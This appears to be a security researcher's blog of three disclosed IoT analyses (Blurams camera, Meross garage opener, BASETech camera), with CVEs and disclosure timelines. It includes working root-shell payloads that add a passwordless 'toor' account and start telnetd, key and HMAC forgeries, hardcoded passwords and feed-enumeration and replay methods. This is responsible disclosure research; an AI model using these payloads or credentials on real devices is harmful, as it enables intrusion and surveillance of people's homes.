Blurams Lumi Security Camera analysis

Continuing the series of analysing cloud enabled devices (see BASETech IP camera and Meross Garage Door Opener for previous research), we have taken a look at the Blurams Lumi Security Camera (A31C). This research and blog post was created in a collaboration with my coworker Arne. This particular device is marketed as a 2-way camera, allowing someone to press a button on the camera to establish live communication with the owner (e.g. for helping children or elderly). Accessing the video and controls of it is done through a mobile application as well as a web-client. You can of course view the video stream and control the device from anywhere in the world. A second device without the 2-way feature was also purchased (A31).

This is a rather long blog post, if you are only interested in the vulnerabilities you can skip right to them by skipping to that chapter. The vulnerabilities were closed by Blurams before the publication of this post.

Recon

To get the device working we first needed to install the “blurams” mobile application and register an account. For the purpose of this analysis a main account was created to which the camera was paired. Other accounts without any paired device were also created.

After that, logged in with the primary account to the mobile application the WiFi credentials are entered and the app is generating a QR code, this code is then scanned by the camera and it joins the WiFi.

Interestingly, this QR code appears to be encrypted. The content of this code is this (hexdump view):

This QR code might also contain the account ID of the user, since the mobile application appears to not directly communicate with the camera. The camera connects to the WiFi, obtains an IP address through DHCP and immediately connects to their cloud infrastructure. Encrypting all communication. Following is a capture of the initial Wireshark dump during and after the setup of the device.

Once connected to the network, the first step is to enumerate any open ports. This device however exposes none:

All further communication with the device is routed through the cloud infrastructure of Blurams. The device uses STUN to allow communication of the mobile application with it. Even if such a device is deployed behind a firewall which blocks all access, STUN makes it possible to remotely access it.

Investigating the web client

There is a web client available through https://client.blurams.com/ which can be used to stream the video and control the device. This client is particularly interesting since it is trivial to intercept its traffic via Burp Suite.

The camera paired to our primary account appears in it already. The video can be viewed live and if enabled (by default it is not) also the cloud stored video can be viewed.

Most of the communication uses REST style endpoints, for example here a list of all paired devices is loaded by the web client:

Included in this response is the device ID of our camera: xxxxS_a0ff22435471

xxxxS_ appears to be a static prefix and a0ff22435471 is simply the MAC address of the device.

Once a live view of the stream is started, a WebSocket connection is initiated like this:

Through the WebSocket connection the client then sends the following request:

The payload of the request is Base64 encoded but in a strange way. The first 10 characters are separately encoded, in this case resulting in 1424276. The remainder is a single encoded block of JSON data which is being cut in the middle and reversed, resulting in this:

":"720p","deviceName":"","clientId":"WEBCLIENT_H5_80424545391278391689940921836",
"shareId":"","relayServer":"10.150.2.147:50921","isSDCardPlayback":"false",
"preConnect":"false","releaseVersion":"","isSupportWASM":"1"}{"requestTime":
"1689940921836","productKey":"1cad3c83-d87","deviceId":"xxxxS_a0ff22435471",
"channelNo":"","token":"a4ef7ff88eb845fe99826d78922a3a8e","hasAudio":"true",
"region":"","isPermanentStorage":"false","channel

Changing the token in this request to the token of another user did not allow them to view the video stream, the backend handled this correctly. Also requesting cloud stored videos worked in a similar way, although not via WebSocket, the same _paramStr_ format is used to retrieve that data, the token is also checked correctly in that instance.

Looking back at the initial view of the devices paired with the account it can be identified that the preview image is not retrieved in the same way. For example, the preview is fetched like this:

The URL parameters after the token can be ignored as they appear to be without any function. Simply accessing the following URL would load the preview image: https://vrs-pho-oci.blurams.com/lookup/thumbnail/xxxxS_a0ff22435471/current?token=a4ef7ff88eb845fe99826d78922a3a8e

The URL contains practically two parameters, the device ID and the users access token. To verify if permissions are checked here, the token was replaced with the token of a secondary user which did not have any device paired. Surprisingly the preview image could be retrieved:

The camera device appears to upload a preview image around every 13 seconds with a low image resolution of 640×360. Since the device ID consists only of the MAC address, it is trivial to enumerate other IDs and gain access to their (almost-) live preview images. For this the camera only needs to be paired to an account and be able to reach the cloud servers. Even if it is installed behind a firewall and incoming connections to it are blocked, as long as it can upload the images, they can be accessed by anyone.

Using this, it is possible to get a semi-live low quality video stream of all currently online cameras. 

Curiously, there is also an endpoint which is used to get settings of the device, the request is done like this:

If the provided device ID is paired to the account, this request is performed instantly. However, when the account has no devices paired or if simply the device ID parameter is removed, then the request takes more than 10 seconds and returns the data of a single random device, for example:

Thankfully with that it is not possible to correlate the device ID with the connected SSID as far as I can tell. The response does not include it. Having the SSID would make locating the physical location of the device much easier.

Getting shell access to the camera

In order to better understand what the camera performs, access to the Linux operating system would be preferred.

Through the endpoint /api/device/checkMultiCameraV2 the address of a firmware image could be identified (e.g. https://fw.blurams.com/Device/1cad3c83-d87/A31C_AK_IPC/1/23.0406.435.4120/a31c_f1r03_LV230525.12237_ota.enc), however the image is encrypted.

Having no other means of connecting to the camera the hardware was the next step to be investigated.

While the board does contain UART pins it was not possible to transmit any data to it. From them only the U-Boot boot loader messages could be read but it wasn’t immediately possible to force single user mode.

Instead to gain initial access to the firmware the flash of the camera was desoldered and dumped.

This worked flawlessly and with that the binaries and configuration could be analyzed.

The file /opt/sh/safe_exec.sh caught our attention. This shell script is configured to be executed on startup by the following code block in /init.d/rcS:

    echo "check factorytest..."
    if [ -d /mnt/sdcard/factorytest ]; then
        echo "start factorytest..."
        cd /mnt/sdcard/factorytest
        /opt/sh/safe_exec.sh ./auth.ini ./factorytest.sh
        exit 0
    fi

The script is as follows:

#########################################################
#
#  auth.ini example:
#
#	KEY=12345678901234567
#	MD5SUM_FILE=test.md5sum
#	MD5SUM_MD5=b757a9fc7aa080272c37902c701e2eb4
#
#########################################################


THISDIR=`dirname $0`
AUTH_FILE=$1
SCRIPT_FILE=$2

exit_with_msg()
{
	echo "$2"
	exit $1
}

check_auth()
{
	[ x"$1" = x"" ] && return 0
	[ -f "$1" ] || return 0
	${THISDIR}/../bin/ukey -t "$1" > /dev/null 2>&1
}

check_emergy_key()
{
    KEY=`grep "KEY=" "$1" | cut -d'=' -f2 | cut -d'e' -f2`
    P1=`cut -d'.' -f1 /etc/version`
    P2=`cut -d'.' -f2 /etc/version`
    P3=`cut -d'.' -f3 /etc/version`
    AUTH1=`expr ${P1} \* 600 + ${P2} \* 30 + ${P3} \* 9`
    AUTH2=`expr ${AUTH1} \* ${AUTH1}`
    test ${AUTH2} = ${KEY}
}

[ x"${AUTH_FILE}" = x"" ] && exit_with_msg 1 "no auth file"
[ x"${SCRIPT_FILE}" = x"" ] && exit_with_msg 1 "no scrip file"

check_emergy_key "${AUTH_FILE}" && {
    echo "fast run ${SCRIPT_FILE} ..."
    sh ${SCRIPT_FILE}
    exit 0
}

check_auth "${AUTH_FILE}" || exit_with_msg 2 "auth file has been changed!"

source "${AUTH_FILE}"
[ x"${MD5SUM_FILE}" = x"" ] && exit_with_msg 3 "no md5sum file"

# get script md5sum
SCRIPT_MD5SUM=`md5sum "${SCRIPT_FILE}" | cut -d' ' -f1`
echo "SCRIPT_MD5SUM=${SCRIPT_MD5SUM}"

# check md5sum of script and other files
AUTH_DIR=`dirname ${AUTH_FILE}`
cd ${AUTH_DIR}
MD5SUM_MD5SUM=`md5sum "${MD5SUM_FILE}" | cut -d' ' -f1`
[ x"${MD5SUM_MD5}" = x"${MD5SUM_MD5SUM}" ] || exit_with_msg 4 "md5sum file has been changed!"
SCRIPT_MD5_COUNT=`grep "${SCRIPT_MD5SUM}" "${MD5SUM_FILE}" | wc -l`
[ x"${SCRIPT_MD5_COUNT}" = x"1" ] || exit_with_msg 5 "script has been changed!"
md5sum -c "${MD5SUM_FILE}" || exit_with_msg 6 "check md5sum failed!"
cd -

echo "check auth ok!"
echo "run ${SCRIPT_FILE} ..." > /dev/null
sh ${SCRIPT_FILE}

Interesting in this script is the check_emergy_key() function. If this function returns true, then the shell script passed through $2 will get executed (line 45). The check_emergy_key() really only takes version numbers from a file and does some calculations on it. The version of our camera can be easily identified, the endpoint /api/device/checkMultiCameraV2 provides this information.

We can do the same calculations quickly with this shell script:

#!/bin/sh
VERSION='23.0406.435.4120'
P1=`echo $VERSION | cut -d'.' -f1`
P2=`echo $VERSION | cut -d'.' -f2`
P3=`echo $VERSION | cut -d'.' -f3`
AUTH1=`expr ${P1} \* 600 + ${P2} \* 30 + ${P3} \* 9`
AUTH2=`expr ${AUTH1} \* ${AUTH1}`
echo $AUTH2

With that configured version, this generates the “key” with the value 893711025. Armed with that information, the folder /factorytest is created on an otherwise empty FAT32 formatted SD card. In that the following auth.ini file is placed:

KEY=893711025

And the following factorytest.sh file:

#!/bin/sh

echo 'toor:x:0:0:root:/:/bin/sh' >> /etc/passwd
echo 'toor::15874:0:99999:7:::' >> /etc/shadow

telnetd &

The supplied shell script will basically create a secondary root account named toor without a password and start telnetd. Putting that SD card into the camera and rebooting it gives us our root-shell via telnet:

Using this access it was then possible to also decrypt the initially identified firmware update file via the main binary of the camera.

Of course for our research this data is not necessary anymore. With shell access we have access to it anyway.

Getting shell access to the camera on version 2.3.38.12558

After disclosing the SD card vulnerability to Blurams, they rolled out a new version and asked if we could take a look at the fix as well. Curious to how it was solved we started to investigate again. Using the API the URL to the firmware could be retrieved again (https://fw.blurams.com/Device/1cad3c83-d87/A31C_AK_IPC/2/2.3.38.12558/a31c_f1r03_LV231215.12558_ota.enc), this was again an encrypted file.

Since we still had access to the device, we could decrypt this file on the camera. After decrypting and unpacking the files, we can see the new safe_exec.sh script:

#########################################################
#
#  auth.ini example:
#
#       KEY=12345678901234567
#       MD5SUM_FILE=test.md5sum
#       MD5SUM_MD5=b757a9fc7aa080272c37902c701e2eb4
#
#########################################################


THISDIR=`dirname $0`
AUTH_FILE=$1
SCRIPT_FILE=$2

exit_with_msg()
{
        echo "$2"
        exit $1
}

check_auth()
{
        [ x"$1" = x"" ] && return 1
        [ -f "$1" ] || return 1
        ${THISDIR}/../bin/ukeyHmacRead -t "$1" > /dev/null 2>&1
}

# check_emergy_key()
# {
#     KEY=`grep "KEY=" "$1" | cut -d'=' -f2 | cut -d'e' -f2`
#     P1=`cut -d'.' -f1 /etc/version`
#     P2=`cut -d'.' -f2 /etc/version`
#     P3=`cut -d'.' -f3 /etc/version`
#     AUTH1=`expr ${P1} \* 600 + ${P2} \* 30 + ${P3} \* 9`
#     AUTH2=`expr ${AUTH1} \* ${AUTH1}`
#     test ${AUTH2} = ${KEY}
# }

[ x"${AUTH_FILE}" = x"" ] && exit_with_msg 1 "no auth file"
[ x"${SCRIPT_FILE}" = x"" ] && exit_with_msg 1 "no scrip file"

# check_emergy_key "${AUTH_FILE}" && {
#     echo "fast run ${SCRIPT_FILE} ..."
#     sh ${SCRIPT_FILE}
#     exit 0
# }

check_auth "${AUTH_FILE}" || exit_with_msg 2 "auth file has been changed!"

source "${AUTH_FILE}"
[ x"${MD5SUM_FILE}" = x"" ] && exit_with_msg 3 "no md5sum file"

[...]

We can see that the vulnerable check_emergy_key() function has been commented out, and instead a new binary was included in the firmware: ukeyHmacRead

The auth.ini file path is passed as an parameter to ukeyHmacRead to perform some check. If this does not fail, then source "/mnt/sdcard/factorytest/auth.ini" is executed. Since we control the content of auth.ini this will provide us code execution. We only need to make sure that the ukeyHmacRead -t "/mnt/sdcard/factorytest/auth.ini" command does not fail.

We copied the new binary to the device and later started to emulate it using qemu trying to figure out what it does. It appears that it calculates and checks an HMAC inside of the file. By analyzing the binary, it’s clear that it now expects KHMAC inside the auth.ini file.

After figuring out that the key needs to be at the end of the file, and needs to contain at least a certain amount of data, the tool could be used to also calculate the key of the file.

Using this, a new auth.ini file can be created to exploit the new firmware to gain a root shell on the device. On an SD card the file /factorytest/exploit.sh is placed with the following content:

#!/bin/sh

echo 'toor:x:0:0:root:/:/bin/sh' >> /etc/passwd
echo 'toor::15874:0:99999:7:::' >> /etc/shadow

telnetd &

And the file /factorytest/auth.ini is placed on it with this content:

KEY=12345
/mnt/sdcard/factorytest/exploit.sh
KHMAC=6213ddd1e497593bfe4f2cb25af5e47eaaef69196d45c22678e06cbde54cff84

Armed with this knowledge, the device was updated to the latest firmware version. After that the SD card was inserted and the device rebooted, a few seconds later the exploit executed and telnet was available again.

Having access to the device and being able to decrypt the firmware update file allowed us to very quickly gain access to the ukeyHmacRead binary. It should be noted that without this access, an attacker could again desolder and dump the memory of the flash to access the files. Using this short-cut just saved us a lot of time.

Vulnerabilities

This is the condensed list of vulnerabilities identified during this research in order of appearance. At the time of publishing this article, all of the vulnerabilities have been fixed.

1. Unauthorised access to camera feed thumbnails

The cameras upload a lower resolution thumbnail (usually 640×360) every roughly 13 seconds. These thumbnails can be accessed by providing any valid access token, it is not verified if the access token is from an account paired with the camera. Creating an account go get a token is free and does not require the purchase of a camera.

The camera ID required to access cameras is based on the mac address of the device and can therefore be trivially enumerated.

With that it was possible for anyone to access any camera thumbnail image of any camera that was currently online.

2. Code execution through SD card (CVE-2023-50488)

By abusing a factory test script on the device it is possible to execute any command on the device as the root user.

A key which should protect this function is based only on the software version string of the device. These version strings are generally publicly known. The key can therefore be calculated and this factory test function can be abused to get code execution on the device.

Placing two files on an SD card, inserting this SD card into the device and rebooting the device will execute a attacker provided shell script with root privileges on it (see examples on GitHub). This potentially affects all devices up to and including firmware version 23.0406.435.4120.

3. Code execution through SD card (CVE-2023-51820)

Again abusing a factory test script on the device it is possible to execute any command on the device as the root user.

The key has been moved from being calculated based on the version string, to a static key inside a binary. If the key is once obtained, then a file can be forged that allows code execution on all devices running this firmware version.

Placing two files on an SD card, inserting this SD card into the device and rebooting the device will execute a attacker provided shell script with root privileges on it (see examples on GitHub). This only affects devices with firmware version 2.3.38.12558 installed.

Conclusion

Due to time issues, this is as far as our investigation goes. Ultimately we were unable to access the HD video stream, access was only possible to the semi-live preview images of the video streams.

Overall we were surprised by the sophistication of the device which is relatively cheap. Communication is for the most parts encrypted, no services are exposed via network, an update mechanism appears to exist, and using UART it was not trivially possible to boot into single user mode.

We hope that this ground-work enables other researches to further investigate the devices. We haven’t even started to look at the mobile Apps or the main camera binary.

Working with Blurams, once a communication channel was established, has been great. They were interested in fixing the reported vulnerabilities, asked us to check their remediations and took our recommendations.

Disclosure timeline

2023-11-03: Vulnerabilities initially identified, first attempt to contact Blurams (via email)
2023-11-14: Second attempt to contact Blurams (via email)
2023-11-23: Third attempt to contact Blurams (on Twitter)
2023-12-04: Another attempt to contact Blurams (via email and Twitter)
2023-12-07: Blurams acknowledges the vulnerabilities
2023-12-16: Blurams lets us know that the issues are fixed and asks if we can verify
2023-12-18: We verify that the thumbnails can no longer be accessed but point out a new problem with the SD card remediation
2023-12-29: Blurams acknowledges again and asks us to verify a new implemented fix
2024-01-02: We verify that the SD card vulnerability is now also fixed
2024-02-01: Public disclosure

Meross Smart Wi-Fi Garage Door Opener analysis

Intro

This post is another research project I conducted while in COVID-19 lockdown. The Meross Smart Wi-Fi Garage Door Opener (MSG100, firmware version 3.1.15, hardware version 3.5.0) is an addition you can add to your existing garage door opener. This device is connected via wireless LAN to your network and allows you to trigger open or close requests through a mobile application. You do not have to be locally in the same network for this to work, you can close, open or view the status from anywhere in the world.

This is a rather long blog post, if you are only interested in the vulnerabilities you can skip right to them by skipping to that chapter. The vulnerabilities were closed by Meross since the publication of this post.

Practically the device is acting as a remote controlled button. If you press the open or close function in the mobile application, the device simply closes a electrical circuit which should be connected to the existing garage opener. Closing that circuit tells the garage door to close or open. It also includes a sensor to check if the door is closed or not. Power is provided through a USB connector.

After identifying vulnerabilities in this device I also verified that they affect at least the Meross Smart Wi-Fi Plug (MSS210, firmware version 5.1.1, hardware version 5.0.0). Possibly all devices which use this platform could be affected by this.

Recon

To set up the device the Meross mobile app is required. To use it, we need to first create a new account.

Afterwards we can start to add the new device to our account. The app guides us through this setup. When the device first boots up it opens a wireless LAN hotspot. The mobile app instructs us to connect to it.

During this setup a secret key is being deployed on the device. This key appears to be specific to the logged in user.

After that setup, the device now connects to the provided wireless network and is ready to use. As the device is now part of the network, the first step was to run a port scan against it:

The device only opens one port, it is accepting HTTP requests on port 80. Simply requesting anything from it did not work, running any sort of directory brute force tool against it reliably crashed the device.

Next an iPhone was set up to send all traffic to a interception proxy and the application was used while being connected to the network. In that state, the mobile app directly uses the web server on the device to communicate with it.

As can be seen in the screenshot, the message the web server accepts is JSON formatted and contains a payload as well as a header section. The header always contains a “sign” field. This field is signed using the previously deployed secret key. Any change of the message is detected and the system does not execute it:

In the above case the timestamp was tampered with, and the device correctly rejected this message. Interestingly it appears that only the content of the header is signed but not the payload. Replaying that message but changing the “open” field in the header does get executed:

This means if an attacker captures the request to close the garage door, that message can be altered to open the garage (or vice versa). Also this reveals that the device has no protection at all against replay attacks. The header includes a “timestamp” field which is part of the signature, but it is not verified that the timestamp is in an acceptable time-frame. Even a day old message can be replayed and it will get executed by the device.

Next the iPhone was moved to a different network to simulate the “open from anywhere” functionality. When doing so, the interception proxy did not capture any traffic that contained messages to open the garage door.

Capturing the network traffic at that point showed that the app does communicate outgoing on port 443 with host “54.77.214.248”, the traffic was encrypted but it was not HTTPS:

The hostname “mqtt-eu.meross.com” already gave a hint that its using the MQTT protocol.

Investigating the MQTT server

The Meross MQTT details have already been investigated by others. I found the GitHub repository albertogeniola/MerossIot as well as Apollon77/meross-cloud extremely helpful. Basically to connect to the Meross MQTT server we need the following:

  • Username: the internal user ID assigned by Meross to our account
  • Password: the secret key concatenated to the user ID, passed through md5
  • Client ID: a specific string in the form of “app:<any md5-sum>”
  • Topic(s) to subscribe to: topic names were already part of the HTTP messages

This is all easily obtainable, logging in with the mobile application gives us both the user ID as well as the secret key:

Using the secret key we can create the password:

echo -n '1245194654bb6420ca3756d09030059deb828ad' |md5sum
774b1d8d8dfc2f38ffe78f93676a81e7  -

With this information we can now connect to the Meross MQTT server. I couldn’t figure out why, but I didn’t manage to connect through “mosquitto_sub“. Instead I used MQTT Explorer which worked without any problems.

The connection to the MQTT server will be done as the user “1245194“. This user was created only for this purpose. This user never had a device enrolled or attached to its account.

We use the following connection details:

As the client ID we set “app:ca09923818dd826a8c09c702877db82b” and that is all that is required to generally connect.

The structure of the used topics were found through the albertogeniola/MerossIot GitHub repository. Each user on the platform has its own MQTT topic in the form of “/app/<$userID>/subscribe“. In this case, we do not subscribe to our own user ID, instead we subscribe to “1238435” – this is the user that has the device attached to its account.

The connection with this setup is allowed. When the device is now being used by the owner or if the sensors notice a state change we also get those messages. For example, if the sensor is triggered from closed to open state the following message is sent to this topic:

{
  "header": {
    "triggerSrc": "DevicePysical",
    "timestampMs": 591,
    "timestamp": 1615975130,
    "sign": "67978ce3534b49079c5cdf5eb0ece248",
    "payloadVersion": 1,
    "namespace": "Appliance.GarageDoor.State",
    "method": "PUSH",
    "messageId": "8d73746387e131c8e09c637989a3a7de",
    "from": "/appliance/2008141004674336100348e1e92b352d/publish"
  },
  "payload": {
    "state": [
      {
        "open": 1,
        "lmTime": 1615975130,
        "channel": 0
      }
    ]
  }
}

In the payload this just tells us that at a specific time the state changed to “1“. In the header it is indicated that this being sent as a “PUSH” message. However, the message contains something much more interesting. In line 11 the “from” field tells us the ID of the garage opener device which triggered this message.

We reconnect to the MQTT server and this time we also subscribe to the topics “/appliance/2008141004674336100348e1e92b352d/publish” and “/appliance/2008141004674336100348e1e92b352d/subscribe“:

If the real user of the device now triggers an action, we can see the following message in the “/appliance/2008141004674336100348e1e92b352d/subscribe” topic:

{
  "payload" : {
    "state" : {
      "channel" : 0,
      "uuid" : "2008141004674336100348e1e92b352d",
      "open" : 1
    }
  },
  "header" : {
    "messageId" : "12c60e2beb46fb657ed06f96aad701fd",
    "method" : "SET",
    "from" : "\/app\/1238435-94CF07DCAD0730A36B1B895C61B45534\/subscribe",
    "payloadVersion" : 1,
    "namespace" : "Appliance.GarageDoor.State",
    "uuid" : "2008141004674336100348e1e92b352d",
    "sign" : "287965cf84bdf08b557163604acbd247",
    "triggerSrc" : "iOS",
    "timestamp" : 1615976692
  }
}

This is the signed message which was sent to open the garage. This message can now be taken and be resent using the MQTT service to open or close the garage door. Since the payload is not signed only a single “SET” message must be captured and as there is no replay protection this message can be used at any later time.

This absolutely works, resending this message like this:

Triggers the local device to close the door, closing the door is causing the device indicate this with loud beeping.

With these two issues combined, an attacker could capture the signed messages over a longer period of time and at some point replay them to open all garage doors that were actively used in the observation timeframe.

Vulnerabilities

This is the condensed list of vulnerabilities identified during this research in order of appearance.

1. No replay attack protection (CVE-2021-35067)

The Meross devices accept JSON payload to trigger actions such as open or close of garage doors. This JSON is either sent directly via plain-text HTTP to the device if the mobile app is in the same network or through MQTT if the mobile app is anywhere else.

The JSON is signed, but no replay protection has been implemented. Additionally only the header is signed, not the full payload. Even a days old message can be re-sent to the device which will execute it. An attacker must only gain access to the close or open message once. They can then later re-use it multiple times.

Due to the incomplete signing of the JSON a message to close the device can be altered to open it.

Update on 2021-06-18: Meross told me they are releasing firmware version 3.2.3 which resolves this. I was not able to verify this yet due to time constraints.

Update on 2021-07-04: I was able to confirm that the vulnerability is closed in version 3.2.3.

2. MQTT server allows access to other devices

The central Meross MQTT server does not check if the connecting user ID is identical with the user ID to which it is subscribing. Practically this means that attackers can access the MQTT user ID topics of all users. They must only guess the user IDs which are numeric and ascending.

If the real user is triggering actions on the device while the attacker is subscribed to the user ID topic, then the unique device ID will be leaked. Using this the attacker can then subscribe to the device specific topic.

If the real user is again triggering an action, then the attacker gains access to the signed message with which this action was triggered. This message can then be replayed as per the previous vulnerability.

Update on 2021-05-30: Meross has fixed this vulnerability.
It is no longer possible to subscribe to topics of other users.

Conclusion

The Meross system contained multiple flaws which combined could have given attackers the ability to unauthorized open garage doors. The same was possible with Meross smart Wi-Fi plugs, they simply used different device IDs but the process was exactly the same.

The devices did not protect against replay attacks of any messages.
Additionally these messages were not protected when the mobile application is used outside of the local network. Anyone could subscribe to the MQTT topics on the central Meross MQTT server and gain access to these signed messages.

An attacker could wait to get access to the desired message (open/close or on/off) and replay it at a later time.

After contacting Meross with the details of the vulnerabilities they responded very quickly and showed an effort to fix the vulnerabilities. In the end the MQTT vulnerabilities were completely resolved. Meross also released a new firmware version which should resolve the replay attack vulnerability, however I could not verify this yet due to time constrains (Update: I confirmed that this is resolved as well).
However, without the ability to capture the signed messages centrally from the MQTT server, the risk of this vulnerability is greatly reduced even if the replay attack is still possible. An attacker would now need to be in a position to already capture network traffic to the garage door opener locally in the network.

Disclosure timeline

2021-03-17: Vulnerabilities initially identified, first attempt to contact Meross
2021-03-20: Sent vulnerability report to correct contact
2021-03-24: Meross acknowledges the vulnerabilities, says they are working on a fix
2021-05-24: Meross releases fixes and invite me to test them
2021-05-30: I retest and confirm the MQTT issue to be fixed but replay attack remains unfixed, asking Meross for clarification
2021-06-18: Meross says version 3.2.3 fixes the replay vulnerability
2021-06-18: Publication of this blogpost after 90 days since initial disclosure
2021-06-29: Meross responded that CVE-2021-35067 has been assigned to the replay attack vulnerability
2021-07-04: I was able to confirm that version 3.2.3 fixes the replay attack vulnerability

BASETech IP camera analysis

Intro

This post in depth describes my analysis of the BASETech (GE-131 BT-1837836) IP camera and the vulnerabilities resulting from this research. This is a rather long blog post, if you are only interested in the vulnerabilities you can skip right to them by skipping to that chapter.

At the time of the analysis the camera had the latest firmware (“20180921”), it appears that this camera never got a firmware update in its lifetime yet.

I suspect that this camera is sold under different brands and names across the world. This model is aimed at the german market. BASETech seems to be a low budget brand primarily sold and possibly owned by Conrad.de. If you own a camera that seems similar to this, I’d love to hear from you, contact me.

Recon

The camera does not have any physical interfaces, it only works via Wireless-LAN. It’s a rather small device, it gets power through USB. The USB port does not transmit any data as far as I can tell.

The camera can only be configured through a mobile phone application (“V12”), the video stream is viewed via the same app. After configuring WiFi an initial nmap-scan yielded a few interesting results:

The web-server only displayed a page about installing an plugin with a link to an EXE-file, that link returned a 404. The telnet service of course was of high interest, but none of the default IoT passwords worked.

Using the mobile application “V12” to connect to it, it first requires you to create an account.

Notably the blue text “the privacy terms” is not a link, it just does nothing, there are no privacy terms you could read. After accepting that you have still read them, you can add a device to the app.

To connect the app needs the device ID and a password. The password field is helpfully already pre-filled with “123456” which is the default password. After connecting to the device the stream is displayed in a small section of the app.

Interestingly, access to the video stream is possible from outside the network even if the camera is behind a firewall or NAT device. As long as the camera can connect to the internet, the stream can be viewed by this mobile application. The camera connects for that to a central broker service in China, the mobile application does the same when trying to access the stream. This is not explicitly stated anywhere, but this means that every camera is publicly reachable as long as outbound connections work even if access to the camera is restricted.

Opening up the hardware device, we can identify connectors on the right hand side of the device that are very likely UART as they are even labeled correctly.

Getting a shell on the system

Simply connecting wires to these connectors should be enough, no soldering required!

Using a UART to USB device we can now connect to that port and see the debug output of the device. Rebooting while attached to the serial port we can see and interrupt the U-Boot process.

We can get the device to boot into single user mode by simply getting the boot parameters and appending “single” to them.

Booting it up, we get a root shell. The system doesn’t automatically mount the interesting file system and automatically reboots after a few seconds when the camera process does not spawn. So we needed to quickly run the init process (“/etc/init.d/rcS“) and after that we have a somewhat stable shell with access to the filesystem. From there we immediately get “/etc/passwd“.

The system is running a small Linux built on BusyBox which is typical for such devices.

 Access through telnet

The obtained password hash (“$1$OIqi6jzq$MFDXCYYUxHyGC86C44zRt0“) could not be cracked with any of the usual password lists. But running hashcat against it for around 2 hours with 2 NVIDIA GTX 1080 Ti cracked the password.

With this password (“laohuqian“) we can now login through telnet as root on the system.

The password is hardcoded to be the same across all of these devices. With access to the password an attacker on the same network as the camera can compromise it instantly.

Inspecting the data on the camera

Using this stable shell through telnet it’s now possible dump the full filesystem for easier inspection. For that tar through a netcat connection has been used.

Inspecting the contents of the file system yielded some interesting results. As a first step, we know that the current password is set to “123456“, so we can simply search the entire system for that string:

This file is a SQLite database, which can be inspected further:

The password is not hashed, the password is stored in plain-text. If you changed the password, an attacker with filesystem access can get the plain-text password through this. There also appears to be 2 users configured.

Next the web-server configuration was inspected. It is still unclear what the purpose of this process is at all. While checking the configuration the following option was found:

This is a bizarre choice for the DocumentRoot. Essentially this allows anyone with network access to the camera to download any files from “/etc“. As an example the root password hash, the device ID, the mentioned SQLite user database as well as the Wireless configuration in plain text has been retrieved.

With this information the video stream can be accessed remotely and access to the Wireless network can be gained as well.

Investigating the device ID

The device ID which is required to add the camera to the mobile application was only stored as part of a network configuration (which wasn’t even used on this device) but it was unclear how that ID was generated. It was not stored anywhere else.

Booting the device again with the serial interface attached the following log message can be found:

The device ID is simply the serial number of the used board. This serial number is sequential and 8 hex-characters long, you can predict the device ID of other devices rather easily and if they have not changed their password you can access their video stream.

Investigating the network traffic

When the camera is connected to the Wireless LAN, it starts by probing for external network connectivity by sending a ping request to “8.8.4.4“:

If external network connectivity is established, the camera sends its device ID and assigned (internal) IP address to a host in China:

That host responds back with the external IP address of the camera network. If a mobile application connects to the camera, after the initial discovery through the Chinese system, the communication is directly peer to peer. The video stream is never transmitted to the system in China. Most of the communication is done through UDP (and more specifically UDT). The user credentials are sent in plain-text and can be captured trivially on any network device between the systems, in this case username “admin” and password “123456“:

Investigating “Default” user

When accessing the filesystem for the first time, the “/etc/user.db” SQLite database was discovered, which contained two users: “admin” and “Default”. The mobile application never allowed to specify a username, changing the password through the application only changed the password of the “admin” user. But as could be observed in the network traffic investigation, the application does send the username “admin” in the authentication request.

Looking further into the SQLite database we can get the schema of the “USER” table:

It’s obvious that the “Default” account appears to have different permission flags, but the “ENABLE” flag is set on it as well. The “REMOTE” flag is different between the accounts. To check if these flags have any meaning the flags of the “admin” user were changed to be the same as the “Default” users flags:

After that connecting as the “admin” user still worked. The next logical step was to use the “Default” user to authenticate to the camera, but again, it’s not possible to specify the username in the application. Reverse engineering the mobile application was briefly considered and then discarded. Instead an interception proxy was created that would simply replace the username on the network layer, since the application doesn’t use any form of encryption this should be possible. Sending different authentication attempts to the camera with short and long passwords showed that the length of the packet always remains the same, and the data directly after the password is padded with null-bytes:

Another attempt with a longer password up showed up like this on the wire:

To authenticate as the “Default” user, a Scapy script has been implemented which matches “admin\x00\x00” and replaces it with “Default” as shown here (relevant part only, full script on GitHub):

Running this script on a Linux VM and configuring that VM as the gateway for the mobile phone routes the traffic through it. When sending the authentication packet, it gets matched and the username is replaced:

And it worked, the mobile application displayed the video stream of the camera.

As can be seen in this video, the first connection attempt is not working, the application sends “admin” and “123456”. After that the intercept script on the gateway is started, and the username “admin” is replaced with “Default” on the next attempt. The login then works and the stream is displayed:

For creating that video the “admin” user password has been changed beforehand, so that any login with that account would fail. Capturing the traffic arriving at the camera also shows that the “Default” user has been sent correctly:

This is extremely critical. Even if a user changed the password of the camera, an attacker can now access the video stream. This again works even if the camera is behind a firewall or NAT device, as long as it has outbound internet connectivity. The “Default” user is not documented, the password of it cannot be changed through the application.

Vulnerabilities

This is the condensed list of vulnerabilities identified during this research in order of appearance.

Telnet service running by default, allowing remote root access through hardcoded password (CVE-2020-27555)

On the camera the telnet service is running by default on port 23/tcp. Since the password of the root user is the same across all devices, this allows an attacker with direct network access to simply login as root.

Video-stream user credentials stored in plain-text (CVE-2020-27557)

The password used to access the stream is stored in plain-text in a SQLite database (“/etc/user.db“).

An attacker with access to the system can extract the plain-text password. If the user has changed the password, an attacker can gain access to the video stream again through this.

Web-server is serving /etc folder allowing download of sensitive files (CVE-2020-27553)

The configured web-server on the system is configured with the option “DocumentRoot /etc“. This allows an attacker with network access to the web-server to download any files from the “/etc” folder without authentication.

As an example the root password hash, the device ID, the configured usernames and passwords in plain text as well as the Wireless configuration in plain text has been accessed.

With this an attacker has all the information to access the video stream or further compromise the network through the Wireless network credentials.

Predictable device ID used as identifier to connect to the video stream (CVE-2020-27556)

When accessing a video stream, only the device ID and the password of the system is required. The device ID is the serial number of the board, it is only 8-hex characters long and not randomized. Devices get this ID sequentially assigned during manufacturing.

If the user did not change the password, the device ID is enough to access the video stream, even if the device is not publicly reachable (e.g. behind a firewall or NAT device) as the camera is connecting to a central server which allows connecting back to it.

Credentials are sent in plain-text over the network (CVE-2020-27554)

When the mobile application connects to the camera to view a video stream, the username and password is sent plain-text over the network to authenticate.

Undocumented user can remotely access video stream (CVE-2020-27558)

The camera application has two users configured, “admin” and “Default”. The “admin” user is used by the mobile application automatically, specifying the username is not possible. It’s only possible to change the password of the “admin” user. The “Default” user is not documented or visible, the password of it cannot be changed through the mobile application. The password of it is “123456”.

